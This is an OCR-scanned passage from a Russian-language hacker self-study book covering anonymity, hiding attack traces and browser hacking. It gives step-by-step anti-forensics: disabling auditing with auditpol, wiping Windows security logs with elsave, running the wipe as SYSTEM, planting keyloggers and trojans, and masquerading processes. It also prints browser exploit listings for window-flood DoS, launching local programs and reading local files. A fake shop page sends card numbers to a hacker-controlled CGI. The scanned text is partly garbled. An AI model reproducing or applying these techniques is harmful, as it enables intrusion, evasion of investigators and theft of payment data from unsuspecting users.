Ясно, что обладание такой информацией выдает ваше местоположение с голо-вой — для этого нужно только просмотреть на сервере удаленного доступа про-вайдера все регистрационные журналы и найти запись, фиксирующую инфор-мацию о подключении клиентского компьютера с данным IP-адресом в указан-ное время и с указанного телефона. Так что недаром ныне многие Web-сайты назагруженной Web-странице отображают предупреждение о том, что серверу из-вестен IP-адрес клиентского компьютера — и в случае несанкционированныхдействий последствия гарантированы…

653 — 5830

Page 68: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Чтобы избежать такого развития событий, следует обратиться к сервисам, пре-доставляемым некоторыми Web-узлами, которые на компьютерном сленге на-зываются «анонимайзерами» (от английского слова «anonymizer» — средствосохранения анонимности). Анонимайзер представляет собой службу-посредник, исполняемую на Web-сервере, с помощью которой пользовательможет путешествовать по Сети согласно командам, отдаваемым с браузерасвоего компьютера. Такую услугу предоставляет, например, анонимайзер поадресу http://www.anonymizer.com. (Рис. 4.5).

Anonymizer.com — Onlinu Privacy Sorvic

4-Назад — •» — О и 1Й | ОПоиск СВ Избранное U»Журнал [ ife-r И » В

Адрас Цй hup.//wwwanonymteBf.coin.

Anonymizer.com

Мии(| AboutPrivacy-‘

FIND IT • STO

S spyCap» • • • • •»’•«» :

Рис. 4.5. Для анонимного посещения Web-сайтапросто введите в строку его адрес и щелкните на кнопке Go.

Все последующие ссылки будут направляться от лица анонимайзера

Анонимайзеры — эффективное средство для обеспечения анонимности, но онине лишены недостатков — не все анонимайзеры разрешают FTP-доступ, и мно-гие, в качестве дополнительной «нагрузки», заставляют некоторое время про-сматривать свои рекламные объявления. Кроме того, учтите, что анонимайзеры,как и все Web-серверы, также ведут регистрационные журналы, фиксирующиесвоих посетителей. И если для обычных граждан эти журналы недоступны(в этом и состоит суть услуг анонимайзеров), то для необычных граждан в прин-ципе нет ничего невозможного.

Сделать свои путешествия по Web анонимными можно также с помощью про-кси-серверов, указывая их параметры в разделе Прокси-сервер (Proxy server)диалога настройки удаленного подключения (Рис. 4.6).

66

Page 69: Самоучитель хакера подробное иилюстрированное руководство

Сокрытие следов

-Автоматическая настройка • ‘ » —

Использование автоматической настроит может изменить установленныевручную параметры. Для использования ручной настройки отключитеавтоматическую настройку,

D Автоматическое определение настроек

Q Использовать сценарий автоматической настройки

Адрес

0 Использовать прокси-сервер

Адрес: |www.anonymize| Порт; J8080 [дополнительно…!

D Не использовать прокси-сервер для локальных адресов

-Настройка удаленное

Имя пользователя:

Пароль:

Домен:

111

Свойства

| Настройка

П Не использовать это соединение в программах Интернета

Рис. 4.6. Указание адреса прокси-сервера в настройках удаленного доступа

Прокси-сервер работает, по сути, как анонимайзер, т.е. при запросах Web-сайтовна серверах будет регистрироваться адрес прокси-сервера, но есть и некоторыеотличия.

• Прокси-сервер не отменяет использование файлов куки.

• Прокси-сервер позволяет работать как с HTTP, так и с FTP-серверами, чтодает возможность сделать анонимными не только посещения Web-сайтов, нотакже и загрузку файлов по протоколу FTP.

• Если использовать адрес прокси-сервера своего провайдера Интернета, угро-за идентификации вашего компьютера остается.

• В любом случае прокси-сервер не защитит вас от следопытов со специфиче-скими возможностями.

Для преодоления последнего недостатка можно воспользоваться услугами про-кси-сервера постороннего провайдера. Его можно найти, например, с помощьюпоисковых машин, предоставляемых различными Web-сайтами, скажем, Yahoo.Наберите в строке поиска proxy+server+configuration+Explorer, и в ответ выполучите множество Web-страниц, принадлежащих провайдерам Интернета, сописанием способов настройки их прокси-серверов. Затем попробуйте настроитьна эти прокси-серверы свое удаленное соединение с провайдером Интернета и,как правило, после нескольких попыток у вас это получится.

67

Page 70: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Сокрытие следов атакиИтак, вы уже усвоили, что, подобно обычному грабителю, никакой настоящийхакер, побывав в чужом компьютере, не захочет оставить после себя следы, ко-торые могут привлечь к нему внимание. Перед уходом из системы он создаст вней потайные ходы, поместив в систему клавиатурного шпиона, например, опи-санного в Главе 3 кейлоггера IKS. Или же установит в компьютер утилиту уда-ленного администрирования взломанной системы, например, трояна NetBus(http://www.netBus.org). Но после всего этого хакеру потребуется уничтожитьвсе следы своего пребывания в системе или, как минимум, сделать так, чтобыинформация о его посещении, зарегистрированная системой защиты, не позво-лила определить его личность.

Вот какие методы чаще всего используются взломщиками для сохранения ано-нимности и скрытия следов атаки:

• Самое лучшее — это использовать для хакинга в Интернете посторонние ком-пьютеры, доступ к которым не контролируется в должной степени (а такихкомпьютеров в любой организации — хоть пруд пруди).

• Можно подменить IP-адрес хакерского компьютера, использовав промежу-точный анонимайзер или прокси-сервер, как мы уже обсуждали это вышев этой главе.

• Чтобы скрыть установленные на взломанном компьютере хакерские програм-мы, можно изменить стандартные номера портов этих программ, что затрудня-ет их выявление. Например, широко известная программа Back Orifice 2000вместо стандартного порта 31337 может быть перенастроена на использова-ние, скажем, порта 31336, и программы, анализирующие открытые порты ком-пьютера, могут быть введены в заблуждение.

• Обязательно следует очистить журналы регистрации событий безопасности,которые заполняются средствами аудита систем Windows NT/2000/XP. Чтобыотключить средства аудита, взломщик может прибегнуть к утилите auditpolпакета W2RK, или какой-нибудь другой хакерской утилите, например, el-save.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm). Проще всего этоможно сделать с помощью аплета Просмотр событий (Event Viewer) на па-нели управления Windows 2000/XP.

• Можно скрыть файлы и папки, скопированные во взломанный компьютер,установив в диалоге свойств файлов и папок флажок Скрытый (Hidden).Установка этого атрибута делает файл или папку невидимой в окне проводникаWindows, если только не был установлен режим отображения скрытых файлов.

• Можно скрыть процессы, исполняемые хакерскими программами. Хакерможет замаскировать запущенную им службу или программу, изменив ее

68

Page 71: Самоучитель хакера подробное иилюстрированное руководство

Сокрытие следов

имя на совершенно нейтральное, например, explorer.exe, которое в окнедиспетчера задач Windows можно будет спутать с обычным приложениемпроводника Windows.

• Более сложным являются случаи скрытия процессов хакерских программ заименами других процессов с помощью программ, подобных EliteWrap, опи-санной в [11].

• Наиболее совершенным методом скрытия хакерских программ следует считатьиспользование так называемых руткитов (от английского слова Rootkit — базо-вый комплект инструментов). При этом подлинные программы ядра операци-онной системы подменяются хакерскими утилитами, выполняющими функциивходной регистрации пользователей, ведения журнала нажатых клавиш и пере-сылки собранных данных по сети.

Для противостояния таким трюкам существуют специальные программныесредства контроля целостности компьютерной информации. В качестве примераможно назвать приложение Tripwire (http://www.tripwiresecurity.com), котороепозволяет выполнять контроль целостности файлов и папок, и приложение CiscoSystems (http://www.cisco.com) для проверки и анализа содержимого журналоврегистрации. Системы Windows 2000/XP также предоставляют встроенный инст-румент проверки целостности файлов, про работу с которыми можно узнать,например, в [7].

Отключение аудитаАудит, несомненно, является одним из наиболее серьезных средств защиты отхакинга компьютерной системы, и отключение средств аудита — одна из первыхопераций, которую выполняют хакеры при взломе компьютерной системы. Дляэтого применяются различные утилиты, позволяющие очистить журнал регист-рации и/или отключить аудит системы перед началом «работы».

Для отключения аудита хакеры могут отключить политику аудита штатнымисредствами настройки системы защиты Windows NT/2000/XP, однако лучше при-бегнуть к более мощному средству, предоставляемому утилитой auditpol.exe изкомплекта инструментов W2RK. С ее помощью можно отключать (и включать)аудит как локального, так и удаленного компьютера. Для этого следует из ко-мандной строки ввести такую команду:

C:\Auditpol>auditpol \\ComputerName /disableRunning…Audit information changed successfully on \\ComputerName …New audit policy on \\ComputerName …(0) Audit Disabled

69

Page 72: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

SystemLogonObject AccessPrivilege UseProcess Tracking

Policy ChangeAccount ManagementDirectory Service AccessAccount Logon

= No= No= No= No= Success and Failure

= No= No= No= No

Здесь //ComputerName — имя удаленного компьютера, а ключ /disable задаетотключение аудита на этом компьютере. Утилита auditpol.exe — весьма эффек-тивное средство, созданное для управления сетевыми ресурсами, но также, каквидим, весьма удобный инструмент хакинга (ввод команды auditpol /? отобра-жает справочную информацию о применении утилиты).

Очистка журналов безопасностиДля очистки журнала безопасности с помощью специального аплета на панелиуправления Windows 2000/XP следует выполнить следующие действия:

> Щелкните на кнопке Пуск (Start) и в появившемся главном меню выберитекоманду Настройка ••Панель управления (Settings • Control Panel).

File Action View Help

Event Viewer [Local]

I Type I Description I Sire

Application Error Record! 512…

Delete all records n the log

Puc. 4.7. Очистка журнала событий безопасности средствами Windows

70

Page 73: Самоучитель хакера подробное иилюстрированное руководство

Сокрытие следов

В отобразившейся Панели управления (Control Panel) откройте папкуАдминистрирование (Administrative Tools).

Дважды щелкните на аплете Просмотр событий (Event Viewer). На экранепоявится окно Event Viewer (Просмотр событий) (Рис. 4.7).

Щелкните правой кнопкой мыши на пункте Безопасность (Security Log);появится контекстное меню.

Выберите команду Clear all Events (Стереть все события). Отобразится диа-лог, представленный на Рис. 4.8, с предложением сохранить журнальныесобытия в файле.

Do you want lo save «Security» before clearing it?

Yet No Cancel

Puc. 4.8. Запрос о необходимости сохранения журнала безопасности

> Щелкните на кнопке Нет (No), если вам больше не требуются зафиксирован-ные в журнале события. Журнал будет очищен.

При выполнении очистки журнала безопасности обратите внимание на тот факт,что после выполнения этой операции в журнал сразу же записывается новое собы-тие аудита — только что выполненная операция очистки! Таким образом, хакер всеже оставит свой след — пустой журнал с зафиксированным событием очисткижурнала. Этот недостаток можно исправить, применив для очистки журнала ха-керскую утилиту elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm).Эта утилита предназначена, в первую очередь, для очистки журналовWindows NT 4, но ее последняя версия работает и с системой Windows 2000.Вот как она запускается из командной строки.

C:\els004>elsave -s \\ComputerName -С

Здесь ключ -s задает режим удаленной очистки, а ключ -С задает операциюочистки журнала. Кроме очистки, утилита позволяет копировать события жур-нала в файл. Ввод команды elsave /? приводит к отображению справки, и выможете сами испытать эффективность всех предлагаемых возможностей.

Элементарная проверка показывает, что отмеченный выше недостаток остался -применение утилиты elsave.exe регистрируется в журнале безопасности как собы-тие очистки журнала. Однако теперь мы можем сделать следующий трюк — по-местить задание на очистку журнала утилитой elsave.exe в планировщик заданийWindows (запустив его или из меню Пуск (Start), либо командой AT из команднойстроки MS-DOS). Планировщик выполнит операцию очистки под учетной запи-сью System, что сильно затруднит поиски хакера.

71

Page 74: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

ЗаключениеСокрытие следов своей работы на компьютере и сохранение своей конфиденци-альности в Интернете — это непременное условие для успешной деятельностихакера без особых помех (по крайней мере, какое-то время). Так что не стоитпренебрегать мерами своей защиты, по крайней мере, до приобретения некото-рого опыта. Как показано в этой главе, обеспечение своей безопасности и кон-фиденциальности вовсе не так сложно, если твердо, раз и навсегда преодолетьложное ощущение своей анонимности и недосягаемости во время пребывания ввиртуальном киберпространстве, особенно на чужой территории. И перестаньтепользоваться домашними телефонами — не ройте яму самому себе! Ведь 50%(вдумайтесь — половина!) всех так называемых «хакеров» лезут в чужой огород сдомашнего телефона — большего идиотизма трудно себе представить!

Для антихакера все эти соображения также имеют самое непосредственное зна-чение — пребывая в киберпространстве, очень просто вступить в конфликт с чу-жими интересами или с путаными и туманными законами разных стран, или по-пасть под пристальное внимание личностей самого разного рода занятий и на-клонностей [9]. Ведь недаром ныне на рынке программных продуктов все ак-тивнее предлагаются программы для защиты компьютерной конфиденциально-сти, например, Norton Personal Firewall, PGP Desktop Security и другие. Не стоитими пренебрегать, если вы хотите комфортно чувствовать себя во время пребы-вания в виртуальном компьютерном мире, который ныне все больше и большепересекается с нашим реальным, физически ощутимым миром.

72

Page 75: Самоучитель хакера подробное иилюстрированное руководство

Г Л А В А 5

Хакинг #раузДо сих пор, расписывая деяния хакеров в виртуальном компьютерном мире, мыограничивались автономным компьютером, предполагая, что у хакера имеетсялокальный доступ к консоли компьютерной системы. Однако, как вы сами по-нимаете, огромный виртуальный мир Интернета никак не может быть оставленбез внимания хакеров, поскольку в этом мире имеется очень много полезныхресурсов и личностей, готовых с ними расстаться, причем безвозмездно.

Более того, именно после возникновения в середине 90-х годов прошлого столе-тия общедоступной сети Интернет, хакинг приобрел настоящую силу и мощь.Путешествуя по серверам Интернета, хакер может с помощью своего компьюте-ра проникать во все уголки этого пространства, преследуя при этом свои цели.Далее в этой книги мы займемся обсуждением этих возможностей, а сейчас сде-лаем несколько замечаний, уточняющих терминологию, используемую далеепри описании средств хакинга в Интернете.

Итак, Интернет представляет собой объединение множества сетей, состоящих изсерверов и клиентов, взаимодействующих согласно стеку протоколов TCP/IP.

• Клиенты — это прикладные программы, предназначенные для установлениясоединения с компьютерами сети с целью получения нужной информации.

• Серверы — это прикладные программы, которые предназначены для установле-ния связи с клиентами, получения от клиентов запросов и отправки ответов.Обычно серверы функционируют на мощных компьютерах, соединенных друг сдругом магистральными линиями связи с большой пропускной способностью.

Клиенты функционируют, как правило, на сравнительно менее мощных ком-пьютерах, подсоединенных к серверам с помощью значительно менее быстро-действующих линий связи (например, телефонных линий).

Серверы управляют доступом к информационным ресурсам Интернета, руко-водствуясь запросами клиентов. Этими ресурсами может быть любой объект,содержащий информацию, например, файл базы данных, документ Word и т.д.,или любая служба, позволяющая, например, звонить по телефону или выполнятьфинансовые операции через Интернет.

Основные ресурсы Интернета содержатся в сети WWW (World Wide Web — Все-мирная паутина), или просто Web (Паутина). Сеть Web — это одно из приклад-ных применений сети Интернет, хотя очень многие люди считают терминыИнтернет и Web синонимами. Однако это не так — если возникновение сетиИнтернет можно отнести к 1961 году, то сеть Web возникла в 1992 году и ее раз-витие связано с появлением гипертекстовых информационных систем.

Гипертекстовые информационные системы отличаются тем, что позволяют об-ращаться к хранимому в них гипертексту в произвольном порядке, определяв-

Page 76: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

мом гиперссылками. Именно так и организована сеть Web — множество страни-чек Web представляет собой гипертекст, содержащий множество гиперссылокна информационные ресурсы, хранимые на серверах сети Web.

Сеть Web функционирует с опорой на следующие технические средства.

• Единую систему наименований ресурсов Web, делающую возможным их по-иск по серверам Web и основанную на так называемых адресах URL (UniformResource Locator — Унифицированный указатель информационного ресурса),определяемых протоколом доступа к серверам Web.

• Протокол организации сетевого доступа к именованным сетевым ресурсам, вкачестве которого в Web выступает протокол HTTP (Hyper Text TransferProtocol — Протокол передачи гипертекстовых файлов).

• Гипертекст, облегчающий навигацию по ресурсам Web, для создания кото-рых используется язык HTML (Hyper Text Markup Language — Язык разметкигипертекста).

Чтобы облегчить вам знакомство с этими средствами, обратитесь к литературе,перечисленной в конце книги, в которой обсуждаются основные средства и про-токолы Интернета — язык HTML и протоколы CGI и HTTP.

Все указанные средства Web интересны для хакеров прежде всего тем, что не-достатки системы защиты серверов и клиентов, обслуживающих функциониро-вание Web, позволяют им выполнять некоторые весьма интересные трюки, ре-зультатом которых может быть что угодно — потеря денег на счетах, утрата ра-ботоспособности компьютера, раскрытие конфиденциальности разного рода до-кументов — в Главе 1 мы привели несколько сообщений из Web о последних«достижениях» в этой области.

Рассмотрим некоторые из приемов хакинга в Web и начнем, естественно, с ос-новы основ сети Web — языка HTML и клиентов Web, называемых браузерами(от английского слова browser, дословно означающего «человек, перелисты-вающий книги» или «животное, объедающее побеги»), которые отображаютпользователям Web содержимое Web-страниц.

Злонамеренный код ИТМРЯзык HTML — это средство создания страниц Web, основная функция которогосостоит в форматировании текстового содержимого страницы Web, вставки втекст графики, мультимедийной информации, например, звука, различных инте-рактивных элементов, таких как списки, кнопки и, наконец, сценариев. Таким об-разом, с помощью языка HTML обычный текстовый документ можно превратитьв настоящую программу, которая исполняется браузерами Web, чаще всего, Inter-net Explorer (ffi) и Netscape Navigator (NN).

74

Page 77: Самоучитель хакера подробное иилюстрированное руководство

Хакинг браузеров Web

Хакер рассуждает таким образом: раз страничка Web — это программа, то поче-му бы не заставить код HTML странички Web делать то, что нужно мне, а не то,для чего язык HTML, собственно, предназначен — воспроизведения информаци-онных ресурсов на серверах Web? Тогда первый вопрос — что может сделатьэтот код HTML? Небольшие исследования в этом направлении показывают -что очень многое. Ниже перечислены некоторые (далеко не все) из хакерскихштучек, которые могут заставить поволноваться пользователя, путешествую-щего по Интернету с помощью Web-браузера.

Генерация диалоговПо сути, это атака DoS на компьютер клиента Интернета, выполняемая включе-нием в страничку Web простейших сценариев. Эти сценарии могут, скажем,бесконечно генерировать все новые и новые странички Web, которые браузербудет отображать на экране, пока не переполнит память компьютера.

Проще всего эту атаку можно выполнить с помощью команды open ( ) , которая вбесконечном цикле сценария JavaScript в страничке MainPage.html отображает этуже страничку до переполнения памяти, как это сделано в коде HTML Листинга 8. 1.

Листинг 8.1.Код HTML для бесконечного генерирования диалогов Web-странички

<HTML>

< SCRIPT LANGUAGE* » JavaScript » >

generation () ;

function generation () {

var d=0;

while (true) {

a = new Date;

d = a.getMilliseconds( ) ;

window. open («MainPage. html», d, «width=250, height =250») ;

</SCRIPT>

</HTML>

Если вы решите повторить этот и последующие эксперименты скодом HTML, то предварительно закройте все приложения и за-пустите диспетчера задач, чтобы вовремя прекратить откры-тие все новых и новых диалогов. Хотя системы Windows 2000/XPс браузерами IE 5 и IE 6 устойчивы к ошибкам в кодах HTML, лучшеподстраховаться .

75

Page 78: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Воспроизведение такого кода браузерами IE 5 и IE 6 приведет к стопроцентнойзагрузке процессора и заполнению экрана пустыми диалогами.

tlepеполиеиие памяти

В других злонамеренных сценариях выполняют еще более простой трюк — запи-сывают переменную с очень длинным идентификатором. Например, в Листинге 8.2идентификатор хххххх… ххххх содержит несколько тысяч символов х (здесьони не воспроизведены для экономии места).

Листинг 8.2.Код HTML переполнения памяти в сценарии Web-страницы

<HTML>

<SCR1PT language=JAVASCRIPT>

var p = external.ХХХХХХ… ХХХХХ;

</SCRIPT>

</HTML>

Результатом воспроизведения кода HTML из листинга 8.2 браузером IE версий 5и 6 будет отображение сообщения об ошибке в строке оператора декларирова-ния переменной var p из Листинга 8.2.

Список подобного рода «сценариев» и проделываемых с их помощью «трюков»воистину безграничен (примеры можно найти в [3], [10]). Мы, однако, не будемна них останавливаться и рассмотрим более сложный пример — запуск из кодаHTML программ на клиентском компьютере.

ск программ

В [3] описан метод запуска любых локальных программ с помощью кода HTML,содержащего тег <OBJECT> с ненулевым значением идентификатора CLSID.В листинге 8.3.представлен код HTML, реализующий указанную возможность.

Листинг 8.3.Запуск локальных программ из кода HTML

<HTML>

<OBJECT CLASSID=’CLSID:10000000-0000-0000-0000-000000000000′

CODEBASE^’С: \windows\system32\calc.exe ‘ >

</OBJECT>

</HTML>

При загрузке кода из листинга 8.3 в браузер IE 6 отображается окно браузера,представленное на Рис. 5.1.

76

Page 79: Самоучитель хакера подробное иилюстрированное руководство

Хакинг браузеров Web

JQ C:\Documenl. and Selling*\Alex4Mj> DocuroenUSWork D… [Г)Б1Гх1

Рис. 5.1. Запуск программы калькулятора из кода HTML

В данном случае была запущена программа Калькулятор из папки C:\Windows\system32\calc.exe, однако ничего не мешает злоумышленнику запустить подоб-ным образом программу форматирования дисков локального компьютера, рас-положенную в том же каталоге.

Система защиты Web-браузеров построена таким образом, чтобы сценарииJavaScript, помещаемые в HTML-код Web-страниц, не имели доступа к локаль-ной файловой системе компьютера. Однако и здесь имеется лазейка, связанная стегом IFRAME, предназначенном для внедрения в текст Web-страницы неболь-ших фреймов.

В листинге 8.4 представлен код HTML, позволяющий сценарию прочесть файл,хранящийся в корневом каталоге клиентского компьютера C:\security.txt.

Листинг 8.4.Открытие локальных файлов из сценария Web-странички _

<HTML>

<BODY>

Чтение файла C:\security.txt <BR>

<IFRAME id=Il></IFRAME>

<SCRIPT event=NavigateComplete2(b) for=Il>

alert («Ваш файл содержит такие сведения:

\n » +b . document . body . innerText ) ;

</SCRIPT>

<SCRIPT>

77

Page 80: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

II.navigate(«file://с:/Security.txt»);

setTimeout(‘Il.navigate(nfile://C:/Security.txt»)’,1000);

</SCRIPT>

</BODY>

</HTML>

Загрузка кода из Листинга 8.4 в брау-зерах IE 5 и IE 6 приводит к отобра-жению окна браузера, представлен-ного на Рис. 5.2.

Как видно из Рис. 5.2, содержимоефайла security.txt — строка Это оченьбольшой секрет — отобразилось вофрейме внутри Web-странички. Такимобразом, получив доступ к локальнойфайловой системе, можно подумать ио дальнейшей работе с ее ресурсами -и учтите, что сценарии JavaScript по-зволяют выполнять отправку элек-тронных писем по указанному адресу.Данная уязвимость Web-браузеров

QMd.-0-й и

File Edit View Favorite* Tools Help

Чтение файла C:\security.txt

Это очень большой секрет

Рис. 5.2. Сценарий Web-страничкисумел прочитать локальный файл

связана с ошибками в реализации события NavigateComplete2, которое сообща-ет о завершении перемещения документа на новое место [3].

Подмена Web-caumo&Все описанные выше атаки могут сильно испортить нервы беспечного Web-путешественника, но, как правило, дело только этим и ограничивается — реаль-ный вред с помощью загруженных с Web-страницей враждебных аплетов и сце-нариев нанести достаточно сложно. Подобные атаки практически не опасны, еслизащита Web-браузера настроена на блокирование не сертифицированных элемен-тов ActiveX, и не выполняет в автоматическом режиме загруженные сценарии.

Однако имеется другая разновидность хакинга, основанная исключительно намошенничестве, и ориентированная на извлечение финансовых средств у всехтех личностей, которые, стремясь идти в ногу со временем, обзаводятся кре-дитными карточками, счетами в Интернет-банках, используя их для покупокв Интернет-магазинах и т.д. При этом мало кто из счастливых обладателейИнтернет-карточек представляет, как работает механизм, обслуживающий ихпокупки. Многие вообще не интересуются, как будут использоваться владель-цами виртуального магазина переданные им совершенно конфиденциальныеданные — номер и другие платежные реквизиты кредитной карточки.

78

Page 81: Самоучитель хакера подробное иилюстрированное руководство

Хакинг браузеров Web

Все это — сущий клад для хакера, поскольку все что нужно сделать для обманапокупателей — это создать Web-сайт, копирующий внешний вид электронногомагазина известной фирмы. Далее, распространив ссылки на этот сайт по всемуИнтернету, хакер может без проблем продавать виртуальный воздух и сниматьденьги со счетов доверчивых посетителей.

Другая возможность, которую открывает для хакеров фальсификация Web-страниц — предоставление возможностей для загрузки злонамеренных про-грамм. Например, вместо загрузки нового пакета обновления системы Windowsс Web-сайта Microsoft вы можете загрузить и запустить троянского коня напо-добие уже упоминавшейся программы NetBus.

Сейчас мы опишем технику фальсификации Web-сайта, имитирующего виртуаль-ный «Шоп» по продаже «виртуального воздуха» всем богатеньким и тупым «ла-мерам». Эта техника достаточно проста и заключается в помещении на Web-странице злоумышленника ссылки на сценарий, генерирующий прямо на компь-ютере пользователя фальсифицированный ресурс. В листинге 8.7 приведен при-мер кода HTML, реализующего фальсифицированный Интернет-магазин.

Листинг 8.7.Пример фальсификации документа HTML

<HTML>

<HEAD>

<Т1ТЬЕ>Фирма Bubliki&Baranki предлагает своим посетителямВСЕ!!!!!</TITLE>

</HEAD>

<BODY>

<SCRIPT TYPE=ntext/javascript»>

function falsify() {

z=window.open(«about:Internet-магазин Bubliki&Baranki «);

z.document.open();

z.document.write («<Т1Т1<Е>Электронный магазин фирмы Bub-liki&Baranki</TITLExHl>3aKa3 товара VirtualAir</Hl> <FORMACTION^’http://www.AnyHackerSite.com/cgi/GetCardNumber’METHOD=post>yKa5KMTe свое имя<ВК><ЮТиТ TYPE=text><BR>VKa*oiTeсвой адрес электронной почты<ВК><INPUT TYPE=textxBR>yKa*aiTeномер своей кредитной KapTO4KH<BR>< INPUT TYPE=textxBR><INPUTTYPE=checkbox VALUE=OK>H хочу купить VirtualAir<P> <INPUTTYPE=submit VALUE=’Оплатить’></PORM>»);

z.document.close();

}</SCRIPT>

<H1 ID=»header»>Товар VirtualAir</Hl>

79

Page 82: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Всемирно известная фирма Bubliki&Baranki предлагает Вашему вни-манию продукт VirtualAir, который сделает вашу жизнь гораздолучше! Просто <А HREF=»javascript:var a;» onclick=»falsify()»onMouseOver=»window.status= ‘http://www.Bubliki&Baranki.com1;return true;11 onMouseOut= «window. status= I i n > щелкните здесь,</A> и перейдите к страничке заказа фирмы Bubliki&Baranki!

</BODY></HTML>

При загрузке кода из листинга 8.7 браузер IE 5 отобразит страницу, представ-ленную на Рис. 5.3.

Обратите внимание на отображае-мый в строке состояния адрес ссыл-ки — http://www.Bubliki&Baranki.cornи на текст заголовка окна браузера -Фирма Rog&Kopito предлагает.Посетитель Web-сайта компанииRog&Kopito может заинтересоватьсяновым программным продуктом из-вестной компании Bubliki&Baranki,но покупка программы с Web-сайтакомпании Rog&Kopito может вы-звать у него смутные подозрения.(Надеюсь, вы понимаете, что назва-ния компаний здесь и в последую-щих главах не имеют отношение креальным фирмам и придуманытолько для иллюстрации.) Поэтомупосетителю предоставляется ссылка,якобы приглашающая его перейти наWeb-сайт компании Bubliki&Baranki.После щелчка мышью на ссылкевстроенный в страничку сценарий ото-бражает фальсифицированную Web-страничку, представленную на Рис. 5.4.

Фальсифицированная Web-страничкана Рис. 5.4 предлагает посетителюввести свои идентификационныеданные вместе с номером кредитнойкарточки для оплаты покупки по Ин-тернету. Щелчок на кнопке Отпра-вить отсылает эти очень вкусные

Товар VirtualAirВсемирно извести ад фирма ВиЫш&Вагапй предлагает Е;Ш1емувниманию продукт VutualAir, который сделает вашу жизнь гораздолучше! Просто щелкните зде,сь. и перейдите к страничке заказафирмы Bublild&Baranki!

Рис. 5.3. Web-страница компанииRog&Kopito

File Edit View Favorites Tools Help

Address us) aboutlnternet-Mara3KH—BublikilBaranki» Go

Заказ товара VirtualAirУкажите свое имя

Укажите свой адрес электронной почты

Укажите номер своей кредитной карточки

D Я хочу купить VirtualAir

Оплатить

IDons | My Computei

Рис. 5.4. У/еЪ-страничка заказа продуктаVirtualAir от компании Bubliki&Baranki

80

Page 83: Самоучитель хакера подробное иилюстрированное руководство

Хакинг браузеров Web

данные CGI-сценарию GetCardNumber, как это видно из тега формы в сценарииWeb-странички, помещенной на сервере компании Rog&Kopito:

<FOKM ACTION=’http://www.AnyHackerSite.com/cgi/GetCardNumber1

METHOD =post >

Если пользователь не обратит внимания на мелкую деталь — строку Адрес(Address) с несколько странным содержимым, он может и не заметить подменыреального магазина фальсифицированным «Шопом», в результате которой но-мер его кредитной карточки перекочует в базу данных злоумышленников совсеми, как говорится, вытекающими последствиями.

В старых версиях браузера IE можно было без проблем манипули-ровать строкой Address из сценария Javascript. Хакеры легкоскрывали содержимое этой строки ложным адресом URL Для ил-люстрации кода HTML здесь был использован браузер IE 6, кото-рый весьма затрудняет подобные действия; более того, IE 6 пре-дупреждает о наличии в коде HTML средств для манипулированияотображаемыми данными. Так что будьте начеку!

Другой, не менее интересный способ перехвата конфиденциальных данных,которыми обменивается Web-браузер с сервером — это снифинг сетевых соеди-нений. Перехватывая передаваемые по сети пакеты с номерами кредитных кар-точек, паролями и прочими интересными сведениями, хакеры могут достичьочень многого, о чем мы еще расскажем далее в этой книге.

Методы социальной инженерииПознакомившись с методами хакинга клиентов Интернета, вы, наверное, самипоняли, что во время путешествий по Web ухо следует держать востро. Недос-татки реализации программного обеспечения и некорректная настройка пара-метров системы защиты браузера позволяют хакеру вытворять прямо чудеса.Однако наиболее эффективным методом, очевидно, следует считать элементар-ное мошенничество, основанное на доверчивости и неопытности Web-путешественников.

В предыдущем разделе показано, как легко создать собственный вариантWeb-магазина известной фирмы и начать продавать там виртуальный воздухв обмен на реальные деньги. Этим возможности хакера отнюдь не ограничивают-ся. Предложения «бесплатно» загрузить «чудо-программу», согласиться на за-грузку странички с аплетом без сертификата от доверенного провайдера, щелк-нуть на ссылке и просмотреть «глобальные» возможности различных сайтов -все это сразу же окружает пользователя, появившегося на сайте Интернета с

81

Page 84: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

тщательно обезличенным авторством, но очень конкретными целями. Вот чтоиз этого может получиться.

Загрузив и запустив без всякой проверки распаковку файла программы, вы мо-жете элементарно очистить свой жесткий диск, установить в компьютеретрояна или заразить компьютер вирусом. А поддавшись на уговоры купитьчто-либо на Web-сайте, вы можете подвернуться атаке кардера — так называютхакеров, собирающих номера кредитных карточек у доверчивых простаков.

Основные средства защиты от всех этих напастей таковы:

• Никому не доверять. Все сайты, предлагающие штатные услуги, должныиметь сертификат от надежного поставщика и обеспечивать защищенные со-единения по протоколу SSL.

• Регулярно обновлять Web-браузер и поддерживать настройки его системызащиты на должном уровне.

• Использовать антивирусы.

Всего этого может оказаться недостаточно, если вы столкнетесь с настоящим ха-кером, который владеет более серьезными приемами хакинга, чем описанные вэтой главе. Однако для большинства случаев годятся и перечисленные выше меры.

В следующей главе мы углубимся в более изощренные методы хакинга, связан-ные с электронной почтой. Оказывается, что ныне можно получить такое пись-мецо, что от вас не потребуется вообще ничего, чтобы стать виртуальным рабомнекоего умельца, специализирующегося на комбинации кодов почтовых посла-ний. Этими комбинациями мы и займемся.

ЗаключениеКлиент Web — это весьма притягательный для хакера объект. Ныне виртуальноекиберпространство можно сравнить разве что с территорией, на которой идетнепрерывное сражение за выживание. Чтобы победить в этом сражении, антиха-керу следует уметь защищаться, например, настраивать параметры системы за-щиты браузера и работать с антивирусными пакетами, проверяющими загру-жаемые из Web сценарии и аплеты. Однако все это вам не поможет, если непомнить все время одну простую истину — будучи в Web не доверяйтеНИКОМУ, НИЧЕМУ, НИГДЕ и НИКОГДА — и, быть может, обойдется.

Хакеру же следует учесть, что жизнь не стоит на месте и то, что вполне толковоработало в версии 4 браузера IE и Netscape, ныне, в версиях 5 и 6 уже не функ-ционирует. Стало быть следует все время заботиться о совершенствованиисвоих умений, помня при этом, что другим людям ваши делишки могут и непонравиться.

82

Page 85: Самоучитель хакера подробное иилюстрированное руководство

Г Л А В А 6 .

